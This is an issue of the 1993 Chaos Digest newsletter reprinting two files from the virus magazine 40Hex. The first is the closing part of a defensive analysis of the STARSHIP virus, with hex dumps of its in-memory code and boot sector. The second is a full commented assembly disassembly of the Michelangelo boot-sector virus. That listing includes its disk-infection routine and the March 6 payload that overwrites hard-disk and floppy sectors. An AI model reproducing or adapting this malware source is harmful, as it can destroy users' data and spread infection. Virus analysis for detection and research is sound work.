Copy Link
Add to Bookmark
Report
Chaos Digest Volume 01 Numero 68
Chaos Digest Vendredi 2 Juillet 1993 Volume 1 : Numero 68
ISSN 1244-4901
Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere
TABLE DES MATIERES, #1.68 (2 Juillet 1993)
File 1--40H VMag Number 8 Volume 2 Issue 4 #005(2)-006 (reprint)
Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST
The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.
Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:
* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.
----------------------------------------------------------------------
Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #005(2)-006 (reprint)
5. ERRORS AND BUGS
When STARSHIP infects harddisk it rewrites 6 last sectors
on the disk. The contents of these sectors are unrecoverably
lost!
Moreover, virus controls all disk accesses (via int 13h)
to prevent the rewrite of its code (all writes to virus area
are simply ignored; error condition is not returned). But if
you load DOS from floppy disk and then modify this restricted
zone (for example if you write file and it occasionally will
occupy the last cluster on the harddisk) - computer will not
reboot later and hang. You will need to recreate MBR to
overcome this problem.
I have determined that the problem may appear when the
first used program is MARK (by TurboPower Software). This
program is used in combination with RELEASE to remove all
resident utilities that were loaded after MARK, to save and
restore the interrupt vectors table and state of EMS memory.
When MARK remains resident virus glues to its memory block and
everything is correct. But when you start RELEASE - computer
hangs. This happens because RELEASE restores the interrupts
table in its state before (!) shift of virus to the core RAM,
when virus was in videomemory. Consequently, vectors 13h and
21h after RELEASE points on videomemory where is no
appropriate handlers at this moment - computer immediately
hangs.
Probably, if you replace your CGA, EGA or VGA adaptor
with MDA, your computer will hang after power-up because there
will be no space to store virus during reboot. (Virus checks
videomemory existence only once - prior to disk infection.)
The use of special restoration procedure at address 0:2C0
in the interrupt vectors table must cause the malfunction of
computers that uses vectors B0...BB during reboot. (These
vectors are used by virus only during reboot, when special
restoration procedure is located at address 0:2C0. When virus
goes resident in conventional memory all these vectors are
cleared with zeroes!)
I have detected that some XT computers with RAMDRIVE
driver in the CONFIG.SYS did not execute some programs
(Harvard Graphics, MS-FORTRAN, QuickBASIC).
Some users have reported the problems with the reboot of
infected PS/2 model 30.
These examples establishes the rule - remove virus when
you fixed its presence. There are no harmless viruses.
Remember: any infected program may produce malfunction of your
computer!
6. STARSHIP DETECTION
STARSHIP virus has one special feature - it does not
modify any executable file on the harddisk. So if you use
passive virus detectors (based on the generation of CRC checks
for the files) to test your harddisk - you will never get the
warning about virus activity. Each file on the harddisk will
remain unchanged. Additionally, if this utility examines the
contents of MBR and DOS boot sector, it will not inform you
about the infection if it uses simple interrupt 13h. STARSHIP
will substitute infected MBR with the original in each access
to MBR via int 13h.
How to detect the presence of STARSHIP? It is a real
problem, because the search of infected files based on the
virus descriptor is impossible. No standard software can be
used to found STARSHIP. Only specially designed scanning
programs that analyses the contents of the EXE header or the
code at the file entry point are useful.
Here follows some useful hints that may be used to
determine the presence of STARSHIP virus.
If you have antivirus program AIDSTEST by Lozinsky
(version later than 115, April 1991) it can scan and desinfect
files (AIDSTEST calls virus "STARSHIP-2616"). Sometimes it
refuses to desinfect file and reports something like "Cannot
remove virus. Delete file(Y/N)?".
If you reboot from original DOS diskette and start FDISK
- it shows (Display Partition Information) that Start and End
of DOS partition are equal for the infected harddisk.
You can also detect the presence of STARSHIP virus in
memory if you examine (unassemble) RAM contents at address
0:4B0 with the help of DEBUG (compare with Fig.3).
Typically executable files has text messages, tables or
zeros at the end. So you can visually examine the tail of
executable file and if you will see approximately 2.7 kbytes
of garbage - that is suspicious and you may suggest the
presence of virus. Experienced programmers may also inspect
the program entry point with DEBUG and analyse the
disassembled listing.
I also recommend not to copy executable files on the
floppies directly. Use archive utilities and then copy
archives on the floppies. This sequence saves disk space and
also preserves from file infection. But this method has one
disadvantage. If the initial file is already infected you will
not be able to detect the presence of virus because it is
incorporated into the archive in compressed form.
The identification of STARSHIP virus is complex because
it extensively uses XOR coding and uses random masks. In the
infected file 100% of virus is encrypted. On disk - 5/6 and in
memory - approximately 60%. That is very interesting feature -
virus is not available in pure form, being variable on disk,
in file and in memory.
CONCLUSION
To my opinion the investigated virus is a very
interesting program. Virus code is highly optimized on the
machine-code level. That was possibly done to place the code
exactly into 5 sectors on disk. Virus uses various software
techniques, it has antitracing and antidisassembling
organization, it has no descriptor. These measures were
effective to some extent, because I have some problems in
source reconstruction. In many cases the source seems to be
not fully adequate.
The present stage of virus technology is characterized
with the complexity of virus search, identification and
reconstruction. This tendency to create complex and sneakily
viruses seems to be general. For example remember the XOR
coded 1701 virus group, the Yankee Doodle [5,6] group of
viruses (called also the TP group [3]) that desinfects all
debugged infected files [3,5] and smart Century virus [7], SVC
series that filters all accesses to the directories and
presents original file size for each infected file.
The name of virus (STARSHIP_1) reveals the idea of the
author to extend the series. Be attentive, remember - the use
of backups may save you a vast of time.
ACKNOWLEDGEMENTS
I am greatly acknowledged to V.V.Snegirev and
A.G.Yakovlev for useful discussions. I also like to thank my
wife Helen for her understanding and support.
I am aknowledged to Vesselin Bontchev, who read the draft
variant of the paper and made many valuable comments.
I also wish to acknowledge the sponsorship of NPO
"POLITON" (Moscow, USSR).
REFERENCES
[1] Dewdney A.K., In the game called Core War hostile
programs engage in a battle of bits, Scientific
American, v.250, 5 (1984) 15-19.
[2] Cohen F., Computer viruses: theory and experiments,
Proc. 2nd IFIP Int. Conf. on Computer Security, (1984)
143-158.
[3] Bezrukov N.N., Computer virusology. Part 1: Main work
principles, classification and catalog of viruses in DOS
operating system, Edition 3.6, date 18.07.1990. (In soft
form : files of 745 kbytes total size, 250p. in Russian).
[4] McBroom V., Computer viruses: what they are, how to
protect against them, Software Protection, v.VIII, 3
(1989) 1-16.
[5] Documentation to VIRUSCAN software package from McAfee
Assosiates. Version 4.3V66. File-SCANV66.DOC, size-38024.
[6] McAfee J., The virus cure, Datamation, v.35, 4 (1989)
29-40.
[7] Documentation to Turbo Anti-Virus software package from
CARMEL Software Engineering. Version 6.80A. File-
README.DOC, size-65566.
==================================================================
Table 1. Layout and size of virus procedures.
(the box indicates the encrypted memory section)
Size Offset (hex) Description
3% 000 - 04F Variables and buffers (see Fig.1)
5% 050 - 0C1 Interrupt 13h handler
10% 0C2 - 1C7 Interrupt 21h handler
11% 1C8 - 312 Active part & check for DOS ready
2% 313 - 340 Random number generator (RND)
7% 341 - 3F7 Interrupts 20h, 21h, 27h handlers
+--- encrypted --------------------------------------------+
| 25% 3F8 - 692 Infector of EXE/COM file includes: |
| 9% 3F8 - 4DD input logic |
| 10% 4DE - 5E9 create infected code |
| 6% 5EA - 692 output logic |
| 3% 693 - 6E5 Tables |
| 3% 6E6 - 738 Startup code for EXE/COM |
| 12% 739 - 88F Infect disk |
| 2% 891 - 8BF Interrupt 01h handler (trace) |
| 11% 8C0 - 9D7 PseudoDOS boot and int B0h handler |
+----------------------------------------------------------+
4% 9D8 - A4E Remover of code from videomemory
2% A4F - A8F Buffers (CS, IP, SS, SP, etc.)
=======================================================
Table 2. Minimal and maximal sizes of infected
executable files.
+-------------+------------------------+
| File type | Minimal Maximal |
| | size size |
+-------------+------------------------+
| | |
| .COM | 1917 62202 |
| | |
| .EXE | 1917 512 K |
+-------------+------------------------+
==============================================================================
Figure 1. Memory block header (M-block) and memory dump of STARSHIP
virus located in core RAM. Virus uses segment 18FB, and its memory
block is at 18F2:0).
------------------- M-memory block containing virus --------------------------
18F2:0000 4D 08 00 B0 00 0A 00 A3-8E 0B A1 0C 00 A3 90 0B M...............
------- PSP of file, which termination caused the virus installation ---------
18F3:0000 CD 20 A3 19 00 9A F0 FE-1D F0 2F 01 0B 18 3C 01 . ......../...<.
18F3:0010 0B 18 56 05 0B 18 0B 18-01 01 01 00 02 FF FF FF ..V.............
18F3:0020 FF FF FF FF FF FF FF FF-FF FF FF FF EE 18 E0 FF ................
18F3:0030 00 90 14 00 18 00 F3 18-FF FF FF FF 00 00 00 00 ................
18F3:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
18F3:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
18F3:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
18F3:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
------------------ Here follows the code of virus (CS=18FB) -----------------
18FB:0000 E9 01 10 4E 0A 00 10 00-00 00 00 00 00 42 3A 5C ...N.........B:\
18FB:0010 54 4D 50 5C 44 52 4F 5A-46 49 4C 41 2E 43 4F 4D TMP\DROZFILA.COM
18FB:0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
18FB:0030 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
18FB:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 FF ................
18FB:0050 E9 93 06 3E 53 54 41 52-53 48 49 50 5F 31 3C 80 ...>STARSHIP_1<.
18FB:0060 FA 80 75 41 83 F9 01 75-3F 0A F6 75 38 80 FC 02 ..uA...u?..u8...
18FB:0070 75 29 1E 50 E8 13 03 58-9C FF 1E B8 04 1F 72 18 u).P...X......r.
18FB:0080 50 56 72 16 B8 01 00 BE-BE 01 26 89 40 02 B0 01 PVr.......&.@...
18FB:0090 26 88 40 01 5E 58 F8 FB-EB 7C 3C 80 FC 03 74 F6 &.@.^X...|<...t.
18FB:00A0 80 FC 05 74 F1 E9 3E 01-80 FE 08 75 F8 51 02 C8 ...t..>....u.Q..
18FB:00B0 80 F9 CC 59 72 EF 80 FD-FE 72 EA 80 FC 02 74 D6 ...Yr....r....t.
18FB:00C0 75 D9 FF F1 E8 9C 2E 80-3E 4F 00 00 75 18 50 1E u.......>O..u.P.
18FB:00D0 8C C8 2D 09 00 E8 A9 02-A1 3C 00 48 E8 A2 02 2E ..-......<.H....
18FB:00E0 F6 16 4F 00 1F 58 80 FC-3C 75 31 2E 83 3E 0B 00 ..O..X..<u1..>..
18FB:00F0 00 75 6E E8 6E 00 75 69-9D E8 CC 00 72 18 50 51 .un.n.ui....r.PQ
==================================================================
Figure 2. Dump of pseudoDOS boot sector
(thin line denotes random garbage).
0000 EB 34 90 4D 53 BF 05 00-CD 13 73 09 32 E4 CD 13 .4.MS.....s.2...
0010 4F 75 F5 CD 18 C3 B9 01-00 E8 E9 FF 80 3E 00 7E Ou...........>.~
0020 EB 75 10 A0 02 7E BB 00-7E E8 97 00 0A E4 74 03 .u...~..~.....t.
0030 80 EF 02 06 53 CB FA 33-C0 8E D0 BC 00 7C 8B F4 ....S..3.....|..
0040 8E C0 8E D8 FB FC BF 00-06 B9 00 01 F3 A5 EA 53 ...............S
0050 06 00 00 B9 37 00 BE D6-06 BF C0 02 F3 A4 BF B0 ....7...........
0060 04 B9 08 00 F3 A4 1E C5-06 4C 00 AB 8C D8 AB 1F .........L......
0070 FE 06 FC 7D A1 FC 7D B9-CC FE BB 00 7C BA 80 08 ...}..}.....|...
0080 0A C0 74 08 50 B8 01 03-E8 7A FF 58 41 89 0E DB ..t.P....z.XA...
0090 02 88 36 DF 02 06 BB 00-BB 8E C3 88 26 E7 02 CD ..6.........&...
00A0 B0 26 A2 63 01 26 8C 1E-C2 00 07 FA C7 06 4C 00 .&.c.&........L.
00B0 B0 04 8C 1E 4E 00 FB BB-00 7C B8 06 02 BA 80 00 ....N....|......
00C0 E9 53 FF 53 51 B9 0A 0A-32 E4 26 30 07 26 02 27 .S.SQ...2.&0.&.'
00D0 43 E2 F7 59 5B C3 C4 02-00 00 50 06 53 B8 00 BB C..Y[.....P.S...
00E0 8E C0 BB 50 00 26 80 3F-E9 74 1E 52 51 B8 05 02 ...P.&.?.t.RQ...
00F0 B9 00 00 BA 80 00 9C 2E-FF 1E B8 04 B0 00 B9 0A ................
0100 0A 26 30 07 43 E2 FA 59-5A 5B 07 58 CF CD B0 9A .&0.C..YZ[.X....
+--------------------------------+
0110 5F 00 00 BB EA|1E 0E 1F-8E C0 33 FF 50 FC 32 C0| _.........3.P.2.
+--------------------+ |
|0120 B9 50 00 F3 AA E8 F6 F7-8B F7 B9 0A 0A F3 A4 E8| .P..............
|0130 98 F9 58 FA A3 B5 04 A3-C1 04 B8 90 90 A3 B0 04| ..X.............
|0140 A3 BC 04 C7 06 BF 04 C5-00 B8 EB 05 A3 C8 04 B8| ................
|0150 EB F4 A3 D4 04 BF CA 04-BE DB 04 06 1E 07 A5 A5| ................
|0160 A4 FB A3 D9 04 A3 C8 02-C7 06 E0 02 CD 13 C7 06| ................
|0170 E2 02 EB 0D FE 06 D9 02-CD B0 B9 37 00 BF C0 02| ...........7....
|0180 1E 07 8C D8 F3 AA 07 1F-C3 B4 62 E8 7A F7 C3 90| ..........b.z...
|0190 90 90 90 90 90 90 90 90-90 90 A4 4B 4C EA A6 8C| ...........KL...
|01A0 BE 23 54 F4 BC E8 B8 6B-5B F1 B2 EC B2 81 5E F6| .#T....k[.....^.
|01B0 88 D0 8C BC 64 CC 8E CC-86 69 6A C2 84 C8 80 6F| ....d....ij....o
|01C0 FA 2B C0 8E D0 8E C0 8E-D8 B8 00 7C 8B E0 FB 8B| .+.........|....
|01D0 F0 BF 00 7E FC B9 00 01-F3 A5 E9 00 02 B9 10 00| ...~............
|01E0 8B 36 85 7E F6 04 80 75-08 83 EE 10 E2 F6 EB 37| .6.~...u.......7
| +-----------------+
|01F0 90 BF BE 07 57 B9 08 00-F3 A5|74 91 05 AD 55 AA ....W.....t...U.
+-----------------------------------+
==================================================================
Figure 3. Dispatcher code located at absolute address 0:4B0.
a) virus code located in videomemory
0000:04B0 CD B0 INT B0 <== int 13h
0000:04B2 9A 5F 00 00 BB CALL BB00:005F
0000:04B7 EA 3D A3 00 F0 JMP F000:A33D
0000:04BC CD B0 INT B0 <== int 21h
0000:04BE 9A D6 03 00 BB CALL BB00:03D6
0000:04C3 EA 60 14 73 02 JMP 0273:1460
0000:04C8 CD B0 INT B0 <== int 20h
0000:04CA 9A DD 03 00 BB CALL BB00:03DD
0000:04CF EA 3F 14 73 02 JMP 0273:143F
0000:04D4 CD B0 INT B0 <== int 27h
0000:04D6 9A 93 03 00 BB CALL BB00:0393
0000:04DB EA 66 63 73 02 JMP 0273:6366
b) after removing of code from videomemory
(segment CS=18FB is where virus resides)
0000:04B0 90 NOP <== int 13h
0000:04B1 90 NOP
0000:04B2 9A 5F 00 6D 19 CALL 18FB:005F
0000:04B7 EA 3D A3 00 F0 JMP F000:A33D
0000:04BC 90 NOP <== int 21h
0000:04BD 90 NOP
0000:04BE 9A C5 00 6D 19 CALL 18FB:00C5
0000:04C3 EA 3D A3 00 F0 JMP 0273:1460
0000:04C8 EB 05 JMP 4CF <== int 20h
0000:04CA EA 3F 14 73 02 JMP 0273:143F
0000:04CF EA 66 63 73 02 JMP 0273:6366
0000:04D4 EB F4 JMP 4CA <== int 27h
===============================================================
All corrections and remarks will be greatly appreciated. Send
information directly via E-mail address (MIG@politon.msk.su) or
in comp.virus group of USENET (I am monitoring it permanently).
F .rs mbyt- tF .rs mbyt- tF . (What is this? -Ed.)
+++++
40Hex Number 8 Volume 2 Issue 4 File 006
;This is a disassembly of the much-hyped michelangelo virus.
;As you can see, it is a derivative of the Stoned virus. The
;junk bytes at the end of the file are probably throwbacks to
;the Stoned virus. In any case, it is yet another boot sector
;and partition table infector.
michelangelo segment byte public
assume cs:michelangelo, ds:michelangelo
;Disassembly by Dark Angel of PHALCON/SKISM
org 0
jmp entervirus
highmemjmp db 0F5h, 00h, 80h, 9Fh
maxhead db 2 ;used by damagestuff
firstsector dw 3
oldint13h dd 0C8000256h
int13h:
push ds
push ax
or dl, dl ;default drive?
jnz exitint13h ;exit if not
xor ax, ax
mov ds, ax
test byte ptr ds:[43fh], 1 ;disk 0 on?
jnz exitint13h ;if not spinning, exit
pop ax
pop ds
pushf
call dword ptr cs:[oldint13h];first call old int 13h
pushf
call infectdisk ;then infect
popf
retf 2
exitint13h: pop ax
pop ds
jmp dword ptr cs:[oldint13h]
infectdisk:
push ax
push bx
push cx
push dx
push ds
push es
push si
push di
push cs
pop ds
push cs
pop es
mov si, 4
readbootblock:
mov ax,201h ;Read boot block to
mov bx,200h ;after virus
mov cx,1
xor dx,dx
pushf
call oldint13h
jnc checkinfect ;continue if no error
xor ax,ax
pushf
call oldint13h ;Reset disk
dec si ;loop back
jnz readbootblock
jmp short quitinfect ;exit if too many failures
checkinfect:
xor si,si
cld
lodsw
cmp ax,[bx] ;check if already infected
jne infectitnow
lodsw
cmp ax,[bx+2] ;check again
je quitinfect
infectitnow:
mov ax,301h ;Write old boot block
mov dh,1 ;to head 1
mov cl,3 ;sector 3
cmp byte ptr [bx+15h],0FDh ;360k disk?
je is360Kdisk
mov cl,0Eh
is360Kdisk:
mov firstsector,cx
pushf
call oldint13h
jc quitinfect ;exit on error
mov si,200h+offset partitioninfo
mov di,offset partitioninfo
mov cx,21h ;Copy partition table
cld
rep movsw
mov ax,301h ;Write virus to sector 1
xor bx,bx
mov cx,1
xor dx,dx
pushf
call oldint13h
quitinfect:
pop di
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
retn
entervirus:
xor ax,ax
mov ds,ax
mov ss,ax
mov ax,7C00h ;Set stack to just below
mov sp,ax ;virus load point
sti
push ds ;save 0:7C00h on stack for
push ax ;later retf
mov ax,ds:[13h*4]
mov word ptr ds:[7C00h+offset oldint13h],ax
mov ax,ds:[13h*4+2]
mov word ptr ds:[7C00h+offset oldint13h+2],ax
mov ax,ds:[413h] ;memory size in K
dec ax ;1024 K
dec ax
mov ds:[413h],ax ;move new value in
mov cl,6
shl ax,cl ;ax = paragraphs of memory
mov es,ax ;next line sets seg of jmp
mov word ptr ds:[7C00h+2+offset highmemjmp],ax
mov ax,offset int13h
mov ds:[13h*4],ax
mov ds:[13h*4+2],es
mov cx,offset partitioninfo
mov si,7C00h
xor di,di
cld
rep movsb ;copy to high memory
;and transfer control there
jmp dword ptr cs:[7C00h+offset highmemjmp]
;destination of highmem jmp
xor ax,ax
mov es,ax
int 13h ;reset disk
push cs
pop ds
mov ax,201h
mov bx,7C00h
mov cx,firstsector
cmp cx,7 ;hard disk infection?
jne floppyboot ;if not, do floppies
mov dx,80h ;Read old partition table of
int 13h ;first hard disk to 0:7C00h
jmp short exitvirus
floppyboot:
mov cx,firstsector ;read old boot block
mov dx,100h ;to 0:7C00h
int 13h
jc exitvirus
push cs
pop es
mov ax,201h ;read boot block
mov bx,200h ;of first hard disk
mov cx,1
mov dx,80h
int 13h
jc exitvirus
xor si,si
cld
lodsw
cmp ax,[bx] ;is it infected?
jne infectharddisk ;if not, infect HD
lodsw ;check infection
cmp ax,[bx+2]
jne infectharddisk
exitvirus:
xor cx,cx ;Real time clock get date
mov ah,4 ;dx = mon/day
int 1Ah
cmp dx,306h ;March 6th
je damagestuff
retf ;return control to original
;boot block @ 0:7C00h
damagestuff:
xor dx,dx
mov cx,1
smashanothersector:
mov ax,309h
mov si,firstsector
cmp si,3
je smashit
mov al,0Eh
cmp si,0Eh
je smashit
mov dl,80h ;first hard disk
mov maxhead,4
mov al,11h
smashit:
mov bx,5000h ;random memory area
mov es,bx ;at 5000h:5000h
int 13h ;Write al sectors to drive dl
jnc skiponerror ;skip on error
xor ah,ah ;Reset disk drive dl
int 13h
skiponerror:
inc dh ;next head
cmp dh,maxhead ;2 if floppy, 4 if HD
jb smashanothersector
xor dh,dh ;go to next head/cylinder
inc ch
jmp short smashanothersector
infectharddisk:
mov cx,7 ;Write partition table to
mov firstsector,cx ;sector 7
mov ax,301h
mov dx,80h
int 13h
jc exitvirus
mov si,200h+offset partitioninfo ;Copy partition
mov di,offset partitioninfo ;table information
mov cx,21h
rep movsw
mov ax,301h ;Write to sector 8
xor bx,bx ;Copy virus to sector 1
inc cl
int 13h
;* jmp short 01E0h
db 0EBh, 32h ;?This should crash?
;The following bytes are meaningless.
garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo: db 42h dup (0)
michelangelo ends
end
------------------------------
End of Chaos Digest #1.68
************************************
